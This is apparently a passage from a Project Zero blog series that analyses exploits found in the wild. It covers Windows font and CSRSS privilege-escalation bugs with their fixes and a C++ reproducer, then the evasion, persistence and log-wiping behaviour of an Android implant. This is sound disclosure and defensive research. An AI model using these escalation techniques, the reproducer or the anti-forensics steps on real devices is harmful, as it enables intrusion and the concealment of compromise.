As a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address – the shared user data region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did – it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.

Once kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to a next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with a ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.

The fixes

We reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A security advisory was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.

Since both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:

int ParseBlendVToHOrigin(void *arg) {

  Fixed16_16 *ptrs[16];

  Fixed16_16 values[16];

  if (g_font->numMasters > 0x10) {

    return -4;

  }

  [...]

}

In the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:

int SetBlendDesignPositions(void *arg) {

  int num_master;

  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {

    if (GetToken() != TOKEN_OPEN) {

      break;

    }

    if (num_master >= 16) {

      return -4;

    }

    int values_read = GetOpenFixedArray(&values[num_master], 15);

    SetNumAxes(values_read);

  }

  [...]

}

2. CSRSS issue on Windows 10 (CVE-2020-1027)

Background

The Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.

csrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can’t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.

The communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:

NTSTATUS CsrClientCallServer(

    PCSR_API_MSG ApiMessage, 

    PVOID CaptureBuffer, 

    ULONG ApiNumber, 

    LONG DataLength);

The ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.

The reader can refer to this series of posts for a detailed description of the CSRSS internals.

One of CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">

  <assemblyIdentity type="win32" name="Microsoft.Windows.MySampleApp"

      version="1.0.0.0" processorArchitecture="x86"/>

  <dependency>

    <dependentAssembly>

      <assemblyIdentity type="win32" name="Microsoft.Tools.MyPrivateDll"

          version="2.5.0.0" processorArchitecture="x86"/>

    </dependentAssembly>

  </dependency>

</assembly>

The bug

The vulnerability in question has been discovered in the routine sxssrv! BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.

The relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:

typedef struct _UNICODE_STRING {

  USHORT Length;

  USHORT MaximumLength;

  PWSTR  Buffer;

} UNICODE_STRING, *PUNICODE_STRING;

BaseSrvSxsCreateActivationContext starts with validating the string parameters:

for (i = 0; i < 6; ++i) {

  if (StringField = StringFields[i]) {

    Length = StringField->Length;

    if (Length && !StringField->Buffer ||

        Length > StringField->MaximumLength || Length & 1)

      return 0xC000000D;

    if (StringField->Buffer) {

      if (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,

                                    Length + 2, 1)) {

        DbgPrintEx(0x33, 0,

                   "SXS: Validation of message buffer 0x%lx failed.\n"

                   " Message:%p\n"

                   " String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\n",

                   i, ApiMessage, StringField, StringField->Length,

                   StringField->MaximumLength, StringField->Buffer);

        return 0xC000000D;

      }

      CharCount = StringField->Length >> 1;

      if (StringField->Buffer[CharCount] &&

          StringField->Buffer[CharCount - 1])

        return 0xC000000D;

    }

  }

}

CsrValidateMessageBuffer is declared as follows:

BOOLEAN CsrValidateMessageBuffer(

    PCSR_API_MSG ApiMessage,

    PVOID* Buffer,

    ULONG ElementCount,

    ULONG ElementSize);

This function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn’t cause an integer overflow, and 3) it doesn’t go past the end of the capture buffer.

As the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we’ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:

sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity

sxs!CNodeFactory::CreateNode

sxs!XMLParser::Run

sxs!SxspIncorporateAssembly

sxs!SxspCloseManifestGraph

sxs!SxsGenerateActivationContext

sxssrv!BaseSrvSxsCreateActivationContextFromStructEx

sxssrv!BaseSrvSxsCreateActivationContext

When BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName’s buffer and the unaudited MaximumLength value as the buffer size:

BufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;

if (BufferCapacity) {

  GenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;

  GenActCtxParams.ApplicationNameBuffer =

      CreateCtxParams->ApplicationName.Buffer;

} else {

  GenActCtxParams.ApplicationNameCapacity = 60;

  StringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);

  if (!StringBuffer) {

    Status = 0xC0000017;

    goto error;

  }

  GenActCtxParams.ApplicationNameBuffer = StringBuffer;

}

Then sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:

Context = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);

if (Context) {

  Context = _ACTCTXGENCTX::_ACTCTXGENCTX(Context);

} else {

  FusionpTraceAllocFailure(v14);

  SetLastError(0xE);

  goto error;

}

if (GenActCtxParams->ApplicationNameBuffer &&

    GenActCtxParams->ApplicationNameCapacity) {

  Context->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;

  Context->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;

}

Ultimately, sxs!CNodeFactory::

XMLParser_Element_doc_assembly_assemblyIdentity calls memcpy that can go past the end of the capture buffer:

IdentityNameBuffer = 0;

IdentityNameLength = 0;

SetLastError(0);

if (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,

                                           &IdentityNameBuffer,

                                           &IdentityNameLength)) {

  CallSiteInfo = off_16506FA20;

  goto error;

}

if (IdentityNameLength &&

    IdentityNameLength < Context->ApplicationNameCapacity) {

  memcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,

         2 * IdentityNameLength + 2);

  Context->ApplicationNameLength = IdentityNameLength;

} else {

  *Context->ApplicationNameBuffer = 0;

  Context->ApplicationNameLength = 0;

}

The source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.

Exploitation

Even though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.

As a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there’s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it’s quite difficult to reliably make a “useful” allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.

The logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:

  • Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process. This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.

  • csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the “local” and “remote” addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.

The exploit also has to bypass another security feature, Microsoft’s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG’s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:

1. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN="BB...BB”. The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.

2. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.

3. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:

typedef struct _LDR_MODULE {

  LIST_ENTRY InLoadOrderModuleList;

  LIST_ENTRY InMemoryOrderModuleList;

  LIST_ENTRY InInitializationOrderModuleList;

  PVOID BaseAddress;

  PVOID EntryPoint;

  ULONG SizeOfImage;

  UNICODE_STRING FullDllName;

  UNICODE_STRING BaseDllName;

  ULONG Flags;

  SHORT LoadCount;

  SHORT TlsIndex;

  LIST_ENTRY HashTableEntry;

  ULONG TimeDateStamp;

} LDR_MODULE, *PLDR_MODULE;

When a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can’t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.

4. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.

5. Restore the module list. Once the execution reaches the fake module list processing, it’s important to restore PEB_LDR_DATA’s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.

6. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.

7. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.

8. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.

The fix

We reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.

The patch renamed BaseSrvSxsCreateActivationContext into BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:

ApplicationName = ApiMessage->CreateActivationContext.ApplicationName;

if (ApplicationName.MaximumLength &&

    !CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,

                              ApplicationName.MaximumLength, 1)) {

  SavedMaximumLength = ApplicationName.MaximumLength;

  ApplicationName.MaximumLength = ApplicationName.Length + 2;

}

[...]

if (SavedMaximumLength)

  ApiMessage->CreateActivationContext.ApplicationName.MaximumLength =

      SavedMaximumLength;

return result;

Appendix A

The following reproducer has been tested on Windows 10.0.18363.959.

#include <stdint.h>

#include <stdio.h>

#include <windows.h>

#include <string>

const char* MANIFEST_CONTENTS =

    "<?xml version='1.0' encoding='UTF-8' standalone='yes'?>"

    "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>"

    "<assemblyIdentity name='@' version='1.0.0.0' type='win32' "

    "processorArchitecture='amd64'/>"

    "</assembly>";

const WCHAR* NULL_BYTE_STR = L"\x00\x00";

const WCHAR* MANIFEST_NAME =

  L"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_"

  L"d761caeca23d64a2.manifest";

const WCHAR* PATH = L"\\\\.\\c:Windows\\";

const WCHAR* MODULE = L"System.Data.SqlXml.Resources";

typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,

                                                     ULONG BufferSize);

f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;

typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,

                                                   PVOID CaptureBuffer,

                                                   ULONG ApiNumber,

                                                   ULONG DataLength);

f_CsrClientCallServer CsrClientCallServer;

typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,

                                                       PCSTR String,

                                                       ULONG Length,

                                                       ULONG MaximumLength,

                                                       PSTR OutputString);

f_CsrCaptureMessageString CsrCaptureMessageString;

NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,

                              PCWSTR String, ULONG Length = 0) {

  if (Length == 0) {

    Length = lstrlenW(String);

  }

  return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,

                                 Length * 2 + 2, OutputString);

}

int main() {

  HMODULE Ntdll = LoadLibrary(L"Ntdll.dll");

  CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(

      Ntdll, "CsrAllocateCaptureBuffer");

  CsrClientCallServer =

      (f_CsrClientCallServer)GetProcAddress(Ntdll, "CsrClientCallServer");

  CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(

      Ntdll, "CsrCaptureMessageString");

  char Message[0x220];

  memset(Message, 0, 0x220);

  PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);

  std::string Manifest = MANIFEST_CONTENTS;

  Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A');

  // There's no public definition of the relevant CSR_API_MSG structure.

  // The offsets and values are taken directly from the exploit.

  *(uint32_t*)(Message + 0x40) = 0xc1;

  *(uint16_t*)(Message + 0x44) = 9;

  *(uint16_t*)(Message + 0x59) = 0x201;

  // CSRSS loads the manifest contents from the client process memory;

  // therefore, it doesn't have to be stored in the capture buffer.

  *(const char**)(Message + 0x80) = Manifest.c_str();

  *(uint64_t*)(Message + 0x88) = Manifest.size();

  *(uint64_t*)(Message + 0xf0) = 1;

  CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);

  CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);

  CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);

  CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);

  // Triggers the issue by setting ApplicationName.MaxLength to a large value.

  *(uint16_t*)(Message + 0x122) = 0x8000;

  CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);

}

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

In-the-Wild Series: Android Post-Exploitation

By: Ryan
12 January 2021 at 17:37

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Maddie Stone, Project Zero

A deep-dive into the implant used by a high-tier attacker against Android devices in 2020

Introduction

This post covers what happens once the Android device has been successfully rooted by one of the exploits described in the previous post. What’s especially notable is that while the exploit chain only used known, and some quite old, n-day exploits, the subsequent code is extremely well-engineered and thorough. This leads us to believe that the choice to use n-days is likely not due to a lack of technical expertise.

This post describes what happens post-exploitation of the exploit chain. For this post, I will be calling different portions of the exploit chain as “stage X”. These stage numbers refer to:

  • Stage 1: Chrome renderer exploit
  • Stage 2: Android privilege escalation exploit
  • Stage 3: Post-exploitation downloader ← *described in this post!*
  • Stage 4: Implant

This post details stage 3, the code that runs post exploitation. Stage 3 is an ARM ELF file that expects to run as root. This stage 3 ELF is embedded in the stage 2 binary in the data section. Stage 3 is a downloader for stage 4.

As stated at the beginning, this stage, stage 3,  is a very well-engineered piece of software. It is very thorough in its methods to hide its behavior and ensure that it is running on the correct targeted device. Stage 3 includes obfuscation, many anti-analysis checks, detailed logging, command and control (C2) server communications, and ultimately, the downloading and executing of Stage 4. Based on the size and modularity of the code, it seems likely that it was developed by a team rather than a single individual.

So let’s get into the fun!

Execution

Once stage 2 has successfully rooted the device and modified different security settings, it loads stage 3. Stage 3 is embedded in the data section of stage 2 and is 0x436C bytes in size. Stage 2 includes a variety of different methods to load the stage 3 ELF including writing it to /proc/self/mem. Once one of these methods is successful, execution transfers to stage 3.

This stage 3 ELF exports two functions: init and d. init is the function called by stage 2 to begin execution of stage 3. However, the main functionality for this binary is not in this function. Instead it is in two functions that are referenced by the ELF’s .init_array. The first function ensures that the environment variables PATH, ANDROID_DATA, and ANDROID_ROOT are set to expected values. The second function spawns a new thread that runs the heavy lifting of the behavior of the binary. The init function simply calls pthread_join on the thread spawned by the second function in the .init_array so it will wait for that thread to terminate.

In the newly spawned thread, first, it cleans up from the previous stage by deleting most of the environment variables that stage 2 set. Then it will kill any processes that include the word “knox” in the cmdline. Knox is a security platform that is built into Samsung devices. 

Next, the code will check how often this binary has been running by reading a file that it drops on the device called state.parcel. The execution proceeds normally as long as it hasn’t been run more than 6 times on the current day. In other cases, execution changes as described in the state.parcel file section. 

The binary will then iterate through the process’s open file descriptors 0-2 (usually stdin, stdout, and stderr) and points them to /dev/null. This will prevent output messages from appearing which may lead a user or others to detect the presence of the exploit chain. The code will then iterate through any other open file descriptors (/proc/self/fd/) for the process and close any that include “pipe:” or “anon_inode:” in their symlinks.  It will also close any file descriptors with a number greater than 32 that include “socket:” in the link and any that don’t include /data/dalvik-cache/arm or /dev/ in the name. This may be to prevent debugging or to reduce accidental damage to the rest of the system.

The thread will then call into the function that includes significant functionality for the main behavior of the binary. It decrypts data, sets up configuration data, performs anti-analysis and debugging checks, and finally contacts the C2 server to download the next stage and executes it. This can be considered the main control loop for Stage 3.

The rest of this post explains the technical details of the Stage 3 binary’s behavior, categorized.

Obfuscation

Stage 3 uses quite a few different layers of obfuscation to hide the behavior of the code. It uses a similar string obfuscation technique to stage 2. Another way that the binary obfuscates its behavior is that it uses a hash table to store dynamic configuration settings/status. Instead of using a descriptive string for the “key”, it uses a series of 16 AES-decrypted bytes as the “keys” that are passed to the hashing function.The binary encrypts its static configuration settings, communications with the C2, and a hash table that stores dynamic configuration setting with AES. The state.parcel file that is saved on the device is XOR encoded. The binary also includes multiple techniques to make it harder to understand the behavior of the device using dynamic analysis techniques. For example, it monitors what is mapped into the process’s memory, what file descriptors it has opened, and sends very detailed information to the C2 server.

Similar to the previous stages, Stage 3 seems to be well engineered with a variety of different techniques to make it more difficult for an analyst to determine its behavior, either statically or dynamically. The rest of this section will detail some of the different techniques.

String Obfuscation

The vast majority of the strings within the binary are obfuscated. The obfuscation method is very similar to that used in previous stages. The obfuscated string is passed to a deobfuscation function prior to use. The obfuscated strings are designated by 0x7E7E7E (“~~~”) at the end of the string. To deobfuscate these strings, we used an IDAPython script using flare_emu that emulated the behavior of the deobfuscation function on each string.

Configuration Settings Decryption

A data block within the binary, containing important configuration settings, is encrypted using AES256. It is decrypted upon entrance to the main control function. The decrypted contents are written back to the same location in memory where the encrypted contents were. The code uses OpenSSL to perform the AES256 decryption. The key and the IV are hardcoded into the binary.

Whenever this blog post refers to the “decrypted data block”, we mean this block of memory. The decrypted data includes things such as the C2 server url, the user-agent to use when contacting the C2 server, version information and more. Prior to returning from the main control function, the code will overwrite the decrypted data block to all zeros. This makes it more difficult for an analyst to dump the decrypted memory.

Once the decryption is completed, the code double checks that decryption was successful by looking at certain bytes and verifying their values. If any of these checks fail, the binary will not proceed with contacting the C2 server and downloading stage 4.

Hashtable Encryption

Another block of data that is 0x140 bytes long is then decrypted in the same way. This decrypted data doesn’t include any human-readable strings, but is instead used as “keys” for a hash table that stores configuration settings and status information. We’ll call this area the “decrypted keys block”. The information that is stored in the hash table can change whereas the configuration settings in the decrypted data block above are expected to stay the same throughout execution. The decrypted keys block, which serves as the hash table keys, is shown below.

00000000: 9669 d307 1994 4529 7b07 183e 1e0c 6225  .i....E){..>..b%

00000010: 335f 0f6e 3e41 1eca 1537 3552 188f 932d  3_.n>A...75R...-

00000020: 4bf4 79a4 c5fd 0408 49f4 b412 3fa3 ad23  K.y.....I...?..#

00000030: 837b 5af1 2862 15d9 be29 fd62 605c 6aca  .{Z.(b...).b`\j.

00000040: ad5a dd9c 4548 ca3a 7683 5753 7fb9 970a  .Z..EH.:v.WS....

00000050: fe71 a43d 78b1 72f5 c8d4 b8a4 0c9e 925c  .q.=x.r........\

00000060: d068 f985 2446 136c 5cb0 d155 ad8d 448e  .h..$F.l\..U..D.

00000070: 9307 54ba fc2d 8b72 ba4d 63b8 3109 67c9  ..T..-.r.Mc.1.g.

00000080: e001 77e2 99e8 add2 2f45 1504 557f 9177  ..w...../E..U..w

00000090: 9950 9f98 91e6 551b 6557 9c62 fea8 afef  .P....U.eW.b....

000000a0: 18b8 8043 9071 0f10 38aa e881 9e84 e541  ...C.q..8......A

000000b0: 3fa0 4697 187f fb47 bbe4 6a76 fa4b 5875  ?.F....G..jv.KXu

000000c0: 04d1 2861 6318 69bd 7459 b48c b541 3323  ..(ac.i.tY...A3#

000000d0: 16cd c514 5c7f db99 96d9 5982 f6f1 88ee  ....\.....Y.....

000000e0: f830 fb10 8192 2fea a308 9998 2e0c b798  .0..../.........

000000f0: 367f 7dde 0c95 8c38 8cf3 4dcd acc4 3cd3  6.}....8..M...<.

00000100: 4473 9877 10c8 68e0 1673 b0ad d9cd 085d  Ds.w..h..s.....]

00000110: ab1c ad6f 049d d2d4 65d0 1905 c640 9f61  [email protected]

00000120: 1357 eb9a 3238 74bf ea2d 97e4 a747 d7b6  .W..28t..-...G..

00000130: fd6d 8493 2429 899d c05d 5b94 0096 4593  .m..$)...][...E.

The binary uses this hash table to keep track of important values such as for status and configuration. The code initializes a CRC table which is used in the hashing algorithm and then the hash table is initialized. The structure that manages the hashtable shown below:

struct hashtable_mgr {

    int * hashtable_ptr;

    int maxEntries;

    int numEntries;

}

The first member of this struct points to the hash table which is allocated on the heap and has size 0x1400 bytes when it’s first initialized. The hash table uses sets of 0x10 bytes from the decrypted keys block as the key that gets passed to the hashing function.

There are two main functions that are used to interact with this hashtable throughout the binary: we’ll call them getValueFromHashtable and putValueInHashtable. Both functions take four arguments: pointer to the hashtable manager, pointer to the key (usually represented as an offset from the beginning of the decrypted keys block), a pointer for the value, and an int for the value length. Through the rest of this post, I will refer to values that are stored in the hash table. Because the key is a series of 0x10 bytes, I will refer to values as “the value for offset 0x20 in the hash table”. This means the value that is stored in the hashtable for the “key” that is 0x10 bytes and begins at the address of the start of the decrypted keys block + 0x20.

Each entry in the hashtable has the following structure.

struct hashtable_entry {

    BYTE * key_ptr;

    uint key_len;

    uint in_use;

    BYTE * value_ptr;

    uint value_len;

};

I have documented the majority of the entries in the hashtable here. I use the key’s offset from the beginning of the decrypted keys block as the “key” instead of typing out the series of 0x10 bytes. As shown in the linked sheet, the hashtable contains the dynamic variables that stage 3 needs to keep track of. For example, the filename where to save stage 4 and the install and failure counts.

The hashtable is periodically written to a file named uierrors.txt as described in the Persistence section. This is to save state in case the process exits.

Persistence

The whole exploit chain diligently cleans up after itself to leave as few indicators as possible of its presence. However, stage 3 does save a couple of files and adds environment variables in order to function. This is in addition to the stage 4 code which will be discussed in the “Executing the Next Stage” section. Each of the files and variables described in this section will be deleted as soon as they’re no longer needed, but they will be on a device for at least a period of time. For each of the files that are saved to the device, the directory path is often randomly selected from a set of potential paths. This makes it more time consuming for an analyst to detect the presence of the file on a device because the analyst would have to check 5 different paths for each file rather than 1.

state.parcel File

During startup, the code will record the current time in a file named state.parcel. After it records the current time at the beginning of the file, it will then check how many times per day this has been done by reading all of the times currently in the file. If there are less than 6 entries for the current day, the code proceeds. If there are 6 entries in the file from the current day and there are at least 5 entries for each of the previous 3 days, the binary will set a variable that will tell the code to clean up and exit. If there are 6 entries for the current day and there’s at least one entry for each of the past 3 days, the binary will clean up the persistent files for both this and other stages and then do a max sleep: sleep(0xFFFFFFFF), which is the equivalent of sleeping for over 136 years.

If the effective UID is 0 (root), then the code will randomly choose one of the following paths to write the file to:

  • /data/backup/
  • /data/data/
  • /data/
  • /data/local/
  • /data/local/tmp/

If the effective UID is not 0, then the state.parcel file will be written to whatever directory the binary is executing out of according to /proc/self/exe. The contents in state.parcel are obfuscated by XOR’ing each entry with 0xFF12EE34.

uierrors.txt - Hash table contents

Stage 3 periodically writes the hash table that contains configuration and static information to a file named uierrors.txt. The code uses the same process as for state.parcel to decide which directory to write the file too.

Whenever the hashtable is written to uierrors.txt it is encrypted using AES256. The key is the same AES key used to decrypt the configuration settings data block, but it generates a set of 0x10 random bytes to use as the IV. The IV is written to the uierrors.txt file first and then is followed by the encrypted hash table contents. The CRC32 of the encrypted contents of the file is written to the file as the last 4 bytes.

Environment Variables

On start-up, stage 3 will remove the majority of the environment variables set by the previous stage. It then sets its own new environment variables.

Environment Variable Name

Value

abc

Address of the decryption data block

def

Address of the function that will send logging messages to the C2 server

def2

Address of the function that adds logging messages to the error and/or informational logging message queues

ghi

Points the the decrypted block of hashtable keys

ddd

Address of the function that performs inflate (decompress)

ccc

Address of the function that performs deflate (compress)

0x10 bytes at 0x228CC

???

0x10 bytes at 0x228DC

Pointer to the string representation of the hex_d_uuid

0x10 bytes at 0x228F0

Pointer to the C2 domain URL

0x10 bytes at 0x22904

Pointer to the port string for the C2 server

0x10 bytes at 0x22918

Pointer to the beginning of the certificate

0x10 bytes at 0x2292C

0x1000

0x10 bytes at 0x22940

Pointer to +4AA in decrypted data block

0x10 bytes at 0x22954

0x14

0x10 bytes at 0x22698

Pointer to the user-agent string

PPR

Selinux status such as “selinux-init-read-fail” or “selinux-no-mdm”

PPMM

Set if there is no “persist.security.mdm.policy” string in /init

PPQQ

Set if the “persist.security.mdm.policy” string is in /init

Error Handling & Logging

The binary has a very detailed and mature logging mechanism. It tracks both “error” and “informational” logging messages. These messages are saved until they’re sent to the C2 server either when stage 3 is automatically reaching out to the C2 server, or “on-demand” by calling the subroutine that is saved as environment variable “def”. The subroutine saved as environment variable “def2”, adds messages to the error and/or informational message queues. There are hundreds of different logging messages throughout the binary. I have documented the meaning of some of the different logging codes here.

Clean-Up

This code is very diligent with trying to clean up its tracks, both while it's running and once it finishes. While it’s running, the binary forks a new process which runs code that is responsible for cleaning up logs while the other code is executing. This other process does the following to clean up stage 3’s tracks:

  • Connect to the socket /dev/socket/logd and clear all logs
  • Execute klogctl(5,0,0) which is SYSLOG_ACTION_CLEAR and clears the ring buffer
  • Unlink all of the files in the following directories:
  • /data/tombstones
  • /data/misc/audit
  • /data/system/dropbox
  • /data/anr
  • /data/log
  • Unlinks the file /cache/recovery/last_avc_msg_recovery

There are also a couple of different functions that clean up all potential dropped files from both this stage and other stages and remove the set environment variables.

Communications with C2 Server

